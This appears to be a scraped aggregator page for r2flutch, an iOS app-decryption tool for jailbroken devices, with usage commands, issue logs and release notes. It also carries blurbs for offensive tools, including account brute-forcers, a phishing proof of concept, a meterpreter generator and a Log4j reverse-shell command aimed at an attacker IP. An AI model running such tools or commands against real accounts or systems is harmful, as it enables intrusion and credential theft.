Tool to decrypt iOS apps using r2frida

Last update: Jan 03, 2023

Overview

r2flutch

Yet another tool to decrypt iOS apps using r2frida.

Requirements

It requires to install Frida on the Jailbroken iOS device:

Jailbroken device
Frida installed on the device. (e.g. via Cydia) https://frida.re/docs/ios/#with-jailbreak
radare2 installed. https://github.com/radareorg/radare2

Installation

Using PIP:

pip install r2flutch

Using r2pm

r2pm -ci r2flutch

Usage

Run r2flutch -l to list all the installed apps.

Run r2flutch -i <App Bundle> to pull a decrypted IPA from the device.

Run r2flutch <App Bundle> to pull the decrypted app binary from the device.

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. 🎭

331 Jan 1, 2023

Facebook account cloning/hacking advanced tool + dictionary attack added | Facebook automation tool

loggef Facebook automation tool, Facebook account hacking and cloning advanced tool + dictionary attack added Warning Use this tool for educational pu

149 Aug 10, 2022

labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface

labsecurity labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface. Warning

16 Dec 8, 2022

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting.🎭

This is A Python & Bash Programming Based Termux-Tool Created By CRACKER911181. This Tool Created For Hacking and Pentesting. If You Use This Tool To Evil Purpose,The Owner Will Never be Responsible For That.

1 Jan 10, 2022

A tool to brute force a gmail account. Use this tool to crack multiple accounts

A tool to brute force a gmail account. Use this tool to crack multiple accounts. This tool is developed to crack multiple accounts

12 Dec 30, 2022

Osint-Tool - Information collection tool in python

Osint-Tool Herramienta para la recolección de información Pronto más opciones In

3 Apr 9, 2022

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

12 Dec 17, 2022

An auxiliary tool for iot vulnerability hunter

firmeye - IoT固件漏洞挖掘工具 firmeye 是一个 IDA 插件，基于敏感函数参数回溯来辅助漏洞挖掘。我们知道，在固件漏洞挖掘中，从敏感/危险函数出发，寻找其参数来源，是一种很有效的漏洞挖掘方法，但程序中调用敏感函数的地方非常多，人工分析耗时费力，通过该插件，可以帮助排除大部分的安全

171 Nov 28, 2022

DNS hijacking via dead records automation tool

DeadDNS Multi-threaded DNS hijacking via dead records automation tool How it works 1) Dig provided subdomains file for dead DNS records. 2) Dig the fo

45 Dec 20, 2022

Comments

Error Dumping Application

When attempting to dump an application I ran into this error. Any suggestions on how to proceed?

r2flutch XXXXX
[+] Open Application Process XXXXX
resumed spawned process.
[+] Mount Application Bundle
Mounted io on /r2f at 0x0
[+] Set block size to 0x80000

Invalid address (XXXXXw)
|ERROR| Invalid command 'mdj /r2f/AppBundle/assets/node_modules/@XXXX' (0x6d)

opened by bmbernie 4

ERROR - Failed to copy file: .gitkeep

iOS: 14.6 Device: iphone 7 Jailbrake tool: checkrain

radare2: 5.5.4

MacBook-Pro-di-xspam:jan xspam$ r2flutch -i com.adobe.PSMobile [+] Open Application Process com.adobe.PSMobile resumed spawned process. [+] Mount Application Bundle Mounted io on /r2f at 0x0 [+] Set block size to 0x400000

[+] Loading all modules [+] Dumping Module PS Express at 0x104b1d000 (0x1000 Bytes) Dumped 4096 bytes from 0x104b1d000 into /var/folders/s1/t_833fyx34n_5r4xvjmd6kzr0000gn/T/r2flutch-diqkax00/dump/PS Express File 'PS Express' created. (size: 101806432 bytes) [+] Writing decrypted data to file /var/folders/s1/t_833fyx34n_5r4xvjmd6kzr0000gn/T/r2flutch-diqkax00/bin/PS Express at 0x21000 [+] Patching cryptid at offset 0x11b0 [+] Module /var/folders/s1/t_833fyx34n_5r4xvjmd6kzr0000gn/T/r2flutch-diqkax00/bin/PS Express successfully decrypted [+] Copy application bundle to: /var/folders/s1/t_833fyx34n_5r4xvjmd6kzr0000gn/T/r2flutch-diqkax00/Payload/PS Express.app [+] Copy App Bundle to disk 15%|█████████████████████▋ | 613/4069 [01:03<03:24, 16.90it/s][x] ERROR - Failed to copy file: .gitkeep 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4069/4069 [14:24<00:00, 4.71it/s] [+] Creating IPA file at ./PS Express.ipa [+] IPA file saved at ./PS Express.ipa [*] SUCCESS - r2flutch Decryption Complete!

opened by itsmylife44 1

ERROR - Cannot open target process

$ r2flutch -d -i uk.co.llamasoft.gridrunner
[+] Open Application Process uk.co.llamasoft.gridrunner
[r] Cannot open 'frida://launch/usb/644ceeafa65960cb3a2249b2f6a8b7702381d15b/uk.co.llamasoft.gridrunner'
[x] ERROR - Cannot open target process: uk.co.llamasoft.gridrunner

iOS: 10.3.3 (14G60) Device: iPad mini 2 (ME277B/A) Jailbrake tool: sockH3lix

radare2: 5.4.2 (via brew)

opened by gingerbeardman 1

Releases(1.0.3)

1.0.3(Feb 10, 2022)

Source code(tar.gz)
Source code(zip)
1.0.2(Dec 10, 2021)

Increases blocksize to 4MB.

Recommended updating r2frida to the latest version.
Source code(tar.gz)
Source code(zip)

Owner

Murphy

GitHub Repository

Learning to compose soft prompts for compositional zero-shot learning.

Compositional Soft Prompting (CSP) Compositional soft prompting (CSP), a parameter-efficient learning technique to improve the zero-shot compositional

32 Jan 02, 2023

BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.

Follow us on Twitter! BoobSnail BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro gen

232 Nov 21, 2022

Webpack自动化信息收集

Webpack-信息收集工具郑重声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担。 0x01 介绍作者：小洲团队：横戈安全团队，未来一段时间将陆续开源工具，欢迎关注微信公众号：定位：协助红队人员快速的信息收集，测绘目

214 Dec 19, 2022

Multi Brute Force Facebook - Crack Facebook With Login - Free For Now

✭ SAKERA CRACK Made With ❤️ By Denventa, Araya, Dapunta Author: - Denventa - Araya Dev - Dapunta Khurayra X ⇨ Fitur Login [✯] Login Cookies ⇨ Ins

26 Jan 01, 2023

A DOM-based G-Suite password sprayer and user enumerator

1 Apr 07, 2022

A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

48 Dec 19, 2022

D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation time by modifying IDA Pro microcode.

Introduction fork from https://gitlab.com/eshard/d810 What is D-810 D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation

30 Dec 06, 2022

This project is for finding a solution to use Security Onion Elastic data with Jupyter Notebooks.

This project is for finding a solution to use Security Onion Elastic data with Jupyter Notebooks. The goal is to successfully use this notebook project below with Security Onion for beacon detection

4 Jun 08, 2022

ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

ProxyShell Install git clone https://github.com/ktecv2000/ProxyShell cd ProxyShell virtualenv -p $(which python3) venv source venv/bin/activate pip3 i

312 Dec 09, 2022

The next level Python obfuscator, nearly impossible to deobfuscate.

🐸 Kramer 🐸 Kramer is a next level obfuscation tool written in Python3 allowing you to obfuscate your Python3 code easily and securely. It uses Berse

114 Dec 26, 2022

PKUAutoElective for 2021 spring semester

PKUAutoElective 2021 Spring Version Update at Mar 7 15:28 (UTC+8): 修改了 get_supplement 的 API 参数，已经可以实现课程列表页面的正常跳转，请更新至最新 commit 版本本项目基于 PKUAutoElectiv

84 Sep 09, 2022

Anti-Nuke capabilities, powerful moderation features, auto punishments, captcha-verification and more.

Server-Security-Discord-Bot Anti-Nuke capabilities, powerful moderation features, auto punishments, captcha-verification and more. Installation Instal

20 Apr 07, 2022

Generate obfuscated meterpreter shells

Generator Evade AV with obfuscated payloads Installation must install dotnet prior to running the script with net45 Running ./generator.py -ip Your-I

219 Nov 28, 2022

DCSync - DCSync Attack from Outside using Impacket

Adding DCSync Permissions Mostly copypasta from https://github.com/tothi/rbcd-at

77 Dec 16, 2022

Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

16 Mar 24, 2022

Um script simples de Port Scan + DNS by Hostname

🖥 PortScan-DNS Esta é uma ferramenta simples de Port Scan + DNS by Hostname... 💻 | DNS Resolver / by Hostname: HOST IP EXTERNO IP INTERNO 💻 | Port

7 Dec 08, 2022

Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack

O365DevicePhish Microsoft365_devicePhish Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack This is a simple proof-of-concept script t

4 Sep 23, 2022

dos-atack-tor script de python que permite usar conexiones cebollas para atacar paginas .onion o paginas convencionales via tor.

script de python que permite usar conexiones cebollas para atacar paginas .onion o paginas convencionales via tor. tiene capacidad de ajustar la cantidad de informacion a enviar, el numero de hilos a

2 Jun 01, 2022

Uses Sharphound, Bloodhound and Neo4j to produce an actionable list of attack paths for targeted remediation.

GoodHound ______ ____ __ __ / ____/___ ____ ____/ / / / /___ __ ______ ____/ / / / __/ __ \/ __ \/ __

352 Jan 02, 2023

This tool allows to automatically test for Content Security Policy bypass payloads.

CSPass This tool allows to automatically test for Content Security Policy bypass payloads. Usage [cspass]$ ./cspass.py -h usage: cspass.py [-h] [--no-

30 Nov 22, 2022